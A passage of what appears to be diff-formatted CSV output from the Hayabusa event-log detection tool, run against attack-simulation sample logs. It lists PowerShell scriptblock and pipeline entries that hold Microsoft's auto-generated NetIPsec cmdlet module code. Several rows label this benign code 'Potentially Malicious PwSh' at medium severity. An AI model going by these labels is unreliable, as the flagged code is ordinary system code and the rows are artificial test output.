(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParam",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"eter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase2AuthSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"eter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase2AuthSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.562 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.565 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.566 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.566 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.567 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.567 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.568 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.568 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEMMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodPa",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEMMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 